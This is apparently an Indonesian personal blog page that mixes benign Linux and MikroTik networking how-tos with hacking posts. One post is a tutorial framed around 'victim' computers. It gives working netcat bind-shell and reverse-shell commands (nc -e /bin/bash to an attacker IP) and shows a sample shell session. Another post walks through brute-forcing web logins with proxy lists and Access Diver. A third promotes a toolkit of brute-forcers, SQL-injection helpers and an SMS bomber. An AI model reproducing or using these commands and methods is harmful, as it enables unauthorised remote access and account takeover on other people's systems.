kadang trjadi saat mnginstal paket wireless driver pada OS Slackware.
dalam contoh ini kasus brikut terjadi pada wireless vendoran Broadcom.

ok lngusng saja. download packet driver trus ekstrack lalu dicompile saja......
selesaikan. heheheh... tunggu dulu. untuk linux lain mngkin langkahx ckup bgitu saja misalx d ubuntu. tp ini beda.
sesudah mngcompile paket driverx tadi, kita harus me-load modulnya agar dapat bekerja.

printahx:


Code:

sudo modprobe lib80211
sudo insmod wl.ko



setelah itu kita copy module yang sudah dicompile tadi ke direktory /lib.
atau bisa mnggunakan printah:

Code:

sudo cp wl.ko /lib/modules/`uname -r`/kernel/drivers/net/wireless

tambahkan command :

Code:

modprobe wl

pada file /etc/rc.d/rc.local.

untuk memastikan smuax sdah jalan dan sukses. coba restar (buat down trus up lagi) wireless nya.

semoga bermanfaat.
Diposting oleh * Label: , ,
slamat malam.
tudepoin saja.

berikut merupakan settingan simple dan mngkin benar2 simple untuk konfigurasi mesin mikrotik dan squid sbagai proxy.

topologix sperti berikut : internet -- Mikrotik -- SQUID -- Client

dmna SQUID digunakan sbagai bandwith management

yg dibuthkan

1. Mikrotik box dengan 3 ethernet card yg akan digunakan untuk
ether1 sebagai publik,
ether2 sebagai lan, dan
ether3 sbagai proxy (mnuju squid).

2. Squid box


konfigurasi awal :

1. Mikrotik Box :
* publik ip 192.168.1.2/30 dengan gateway 192..168.1.1, (ip modem)
* proxy ip 192.168.0.1/30,
* lan ip 192.168.10.1/24,

2. Squid Box :
* set dengan ip 192.168.0.2/30
* port 8080

lngsung saja lngkahx :

1. Setting WebProxy pada mikrotik:

================================================================
[Meonkzt@MARS] > /ip web-proxy print
enabled: no
src-address: 0.0.0.0
port: 3128
hostname: "proxy"
transparent-proxy: no
parent-proxy: 0.0.0.0:0
cache-administrator: "webmaster"
max-object-size: 4096KiB
cache-drive: system
max-cache-size: none
max-ram-cache-size: unlimited
status: stopped
reserved-for-cache: 0KiB
reserved-for-ram-cache: 29696KiB
===============================================================

===============================================================
[Meonkzt@MARS] > /ip web-proxy set enabled=yes hostname="proxy" transparent-proxy=yes parent-proxy=192.168.0.2:8080 cache-administrator="meonkz" max-ram-cache-size=none enabled=yes
===============================================================

===============================================================
[Meonkzt@MARS] > /ip web-proxy print
enabled: yes
src-address: 0.0.0.0
port: 3128
hostname: "proxy"
transparent-proxy: yes
parent-proxy: 192.168.0.2:8080
cache-administrator: "meonkz"
max-object-size: 4096KiB
cache-drive: system
max-cache-size: none
max-ram-cache-size: none
status: running
reserved-for-cache: 0KiB
reserved-for-ram-cache: 29696KiB
==============================================================


2. Setting NAT dmna port 80 akan diredirect ke webproxy.

==============================================================
[Meonkzt@MARS] > /ip firewall nat add action=redirect chain=dstnat src-address=192.168.10.0/24 protocol=tcp dst-port=80 to-ports=3128 in-interface=lan
==============================================================


3. selesai. hehehehhe... simple kan..



semoga bemanfaat.

thanks.
Diposting oleh * Label: , , ,
Apa itu remote connection?
Dalam judul aku menuliskan “Interactive Console” dalam tanda kurung. Iya, memang ini yang aq maksud. Remote connection adalah koneksi jarak jauh ke suatu host/komputer dengan mendapatkan sebuah console interaktif dari komputer yang kita remote melalui port tertentu yang telah dibuka. Jadi seakan-akan kita berada langsung di depan komputer yang kita remote dan kita membuka aplikasi console. Namun dalam hal ini, kita berada di jarak jauh dan menggunakan komputer kita,sedangkan console yang kita dapatkan, terkoneksi secara langsung ke komputer sasaran, sehingga command-command yg kita ketik-kan di kirim langsung ke komputer sasaran, inilah interactive console.

Get Console !!
Mendapatkan interaktif console sangat penting dalam melakukan hacking. Selain kecepatan danketepatan, kita juga lebih leluasa mengirimkan perintah ke komputer sasaran, lebih leluasa, lebih bebas, dan sedikit log. Dengan interaktif console, kita bisa meloncat ke session lain dalam komputer yang sama, misal untuk login ke mysql server, root exploit, dll.

Banyak cara, teknik, metode, jurus, trik, maupun strategi untuk mendapatkan console jarak jauh. Mulai dari melalui webshell, RCE, LFI, RFI, atau dengan mengirim ninja ke komputer sasaran untuk membantu kita melakukan remote connection.

Ada 2 cara yang bisa kita lakukan untuk mendapatkan console interaktif ini. Yaitu bindshell, dan backconnect.

BindShell
Bindshell adalah membuka port (binding) pada komputer korban
dengan mengikutkan service/aplikasi yang akan melayani koneksi yang di terima dari port yg di buka. Umumnya aplikasi yang di pakai adalah /bin/bash. Sehingga ketika terjadi koneksi ke port yg di buka, maka komputer korban akan menjalankan aplikasi /bin/bash dan meluncurkannya kepada attacker. Disebut bindshell karena bind di
lakukan dengan memberikan service shell (/bin/bash). Dengan demikian, attacker yg melakukan koneksi ke port yg di bind tersebut, akan mendapatkan /bin/bash dari komputer korban. It is a interactive console.

# BindShell dengan NetCat
Dengan netcat, kita bisa membuka port dengan membuat listening port di komputer korban. Attribut –l di sertakan pada command netcat untuk membuat listening port.

nc –v –l –p [port] –e [service/aplikasi]

contoh : ./nc –v –l –p 4444 –e /bin/bash &


-v : volume. Menunjukkan volume server ketika terjadi koneksi.
-l : listening mode (menunggu koneksi)
-p : open port
-e : set service/aplication

Setelah shell berhasil opening port (listening port) kita tembak dr PC kita dengan cara

nc –vv [ip shell] [port]

BackConnect
Backconnect adalah melakukan remote dari komputer sasaran ke komputer kita. Kalau tadi bindshell adalah remote dari komputer kita ke komputer sasaran, kalau backconnect di balik, dari komputer sasaran ke komputer kita. Backconnect adalah sebuah alternatif bila bindshell gagal, ntah karena gak punya akses, denied akses, sekurity dari firewall, atau karena komputer sasaran tertutup oleh proxy server (komputer sasaran berada di dalam network yang tertutup oleh proxy). Bila ada proxy di depan komputer sasaran, walau bind berhasil, namun kita tetap tidak bisa melakukan remote konek ke sasaran karena tertutup komputer proxy.

Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena port yg kita tuju tidak terbuka di firewall. Firewall menolak semua koneksi/request ke port yang tidak dibuka di firewall tersebut. Paket-paket berisi request yang di kirim oleh attacker tidak bisa melewati dinding firewall karena memang jalur tidak terbuka, sehingga request koneksi tidak pernah sampai di komputer sasaran.

# Backconnnect dengan Netcat
Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip public, atau ip yang terkoneksi langsung ke internet tanpa penghalang proxy.. Cara melakukan backconnect sangat mudah, semudah bindshell. Yang perlu kita lakukan pertama kali adalah set mode listening di komputer kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan menerima aplikasi yang diluncurkan oleh kompi sasaran.

[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...


Kompi kita udah listening. Berikutnya kita koneksikan komputer sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke /tmp. Command untuk backconnect adalah:

nc –vv [ip attacker] [port] –e [launch aplication]

contoh : ./nc –vv 192.168.10.20 6888 –e /bin/bash


Setelah menjalankan command tersebut di komputer sasaran, sekarang lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh komputer sasaran ke komputer kita.


[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86 _64 x86_64 GNU/Linux



* tulisan yg d bold nerupakan perintah yg kita ketikkan.

credits: Gameover 'n Array
Diposting oleh * Label: , , ,
kebetulan tadi ada tman yg nanya gimana carax biar sesama client dalam 1 jaringan lokal tidak bisa melakukan ping tapi tidak menggangu jalanx koneksi internet.

sbnarx saya jg tdak tau ini fngsix untuk apa. tp simple bisa mnghindari kita dari pada netcuter krna no reply request dari ip kita saat dia mlakukan tes koneksi lewat packet icmp. walaupun pada dasarx netcut jalan menggunakan arp. :D kita lihat dlu apakah icmp dan arp saling bergantung. dan mnurut hemat saya tidak, krna paket [B]ICMP [/B]berjalan pada layer 3 dalam OSI layer sedangkan [B]ARP [/B]berjalan pada lapisan ato layer 2. jadi tdak saling terkait.
(gw ngomong apa yh. binun. @_@)

ok lnjut.

ada beberapa cara yg dapat kita lakukan untuk memblok ping ini.
untuk dapt melakukanx, stidakx kita tau ping itu apa. jalan dalam packet apa n pada port brapa.

om pasti sdah bisa menebakx. yah. klo kita sudah tau maka tinggal kita laksanakan. :D
drop packetx dan tutup port nya.

sperti yg kita ketahui. ping berjalan dengan mngirimkan echo request packet icmp. kita lngsung drop saja packet icmp agar tdak trjadi ping. printahx bisa sperti brikut.
pada mikrotik router dapat mnggunakan iptables.

iptables -A INPUT -p icmp --icmp-type 8 -s 192.168.1.xx -j DROP

192.168.1.xx = source IPaddress. tinggal di sesuaikan.

yg kedua bisa dengan meng-drop semua echo request (pada linux)

echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all

dan untuk pengguna wedhus bisa menggunakan comodo firewall. (keren memang ini komodo :D )
dan bisa jg mematikan service workstation. bisa dilihat pada service. (run-> services.msc)

hmmmmmm.,., kyakx cm bisa ka bgitu.
buat om yg lain mohon ditambahkan n koreksi klo ada yg salah.


semoga bermanfaat.
Diposting oleh * Label: , , ,
Minggu, 16 Januari 2011 di 06.31 | 0 komentar  
hmmmm., saya mau coba share cara lain untuk bruteforce login authentication.
dalam hal ini target kita yaitu web yg dimana jika kita mengakses halaman loginx, maka akan muncul jendela Autentikasi.



software yg kita gunakan dsini yaitu Proxy finder dan Acces diver.
lngsung saja.

jalankan proxy finder untuk menyaring Proxy. carax simple, tinggal klik Find dan tunggu sampe selesai ato kita rasa cukup. lalu save list nya. mis. list.txt



berikut buka Acces diver. klik menu My skill dan pilih familiar.
o iy, tools ini sdah memiliki 5000 list username dan password yg disertakan saat pertama kali diinstal. dan bisa kita tambakan jika kita rasa masih kurang.
carax klik menu Wordlist. dsitu ada plihan Load combo list, list username ato list password.

lanjut.
krna kita akan menggunakan proxy, maka kita masuk pada tabulasi Proxy di bagian bawah lalu Proxy Analizer trus Analise proxy. kik open file dan buka proxy list.txt yg kita simpan tadi.
nnti dpat kita lihat dan pillih mana proxy yg kita btuhkan.



jangan lupa untuk mengatur agar melakukan bruting secara paksa.
masuk pada tabulasi Setting lalu Access. cek pada box Always forcea security to begin



masukkan alamat target pada box server. misalx [url]http://members.123456.com/[/url]
lalu jalankan dengan kik Test Basic-Authentication yg logo petir kuning di atas.

tinggal tunggu hasilx.




nb: yang namax brute tdak selamax berhasil 100 persen. krna bergantung pada wordlist yg digunakan dan juga dari segi rumit password yg dicari, yakni gabungan simbol, lowercase dan uppercase serta angka. apalagi jika panjang., misalx

gw3_Me0nk2t M3m4n9 p4L1ng c4kep.. d1 laR4nG pr0t35 ! :P

cba saja anda coba brute, mau pake rainbow crack jg mungin 7 turunan baru bisa.,
:D :D :D

semoga bermanfaat.

sedot toolsx dsni.
Proxy Finder
Acces Diver
Diposting oleh * Label: ,
Jumat, 14 Januari 2011 di 02.57 | 0 komentar  
Diposting oleh * Label: , , , , ,
semuax pasti sdah tau apa itu openSSH.

openSSH yaitu tools FREE yg menggunakan protokol SSH yg dapat dgunakan untuk koneksi yg lebih aman. seperti saat melakukan login ftp atau lainx. karna protokol SSH melakukan enkripsi pada semua trafik yg dikirim.

ok, langsung saja.
sebelumnya kita harus berada dalam posisi root

~$ sudo su



berikut command yg digunakan

apt-get install openssh-server




selanjutnya pastikan konfigurasix sdah benar.
periksa dengan

cat /etc/ssh/sshd_config


brikut file konfigurasix, coba di perhatikan. klo pusing dilewatkan sj. hehehhe.,. :D


# Package generated configuration file
# See the sshd(8) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

UsePAM yes



untuk pnggunaanx:

menjalankan : /etc/init.d/ssh start
berhenti : /etc/init.d/ssh stop
restart : /etc/init.d/ssh restart


semoga bermanfaat.

tested on 2.6.31-22-generic #67-Ubuntu
Diposting oleh * Label: , , ,
nih saya cm mau share kumpulan tools yg mngkin dah gak asing buat yg lain, tools ini milik om Reiluke. ukuranx gak besar kok, gk sampe 1 MB tapi memiliki kmampuan yg lumayan brguna buat pemula n lamer kyak saya,.
yg mau coba bisa langsung ke official site ato rumah pmilikx di http://reiluke.i.ph/

o iy, beberapa tools yg disediakan seperti:

admin fider
blind sqli
cpanel bruteforcer
duplicate remover
email brute
email checker
exploit scanner
rapidshare checker
sms bomber
sqli column counter
sqli helper
steam checker


semoga bermanfaat.,
Diposting oleh * Label: , , ,

Chat Widget
Visit the Site
...........::::::::Wellcome DI BLOG-X =#=#= Gwe Meonkzt =#=#= | Enjoy it:::::::::...........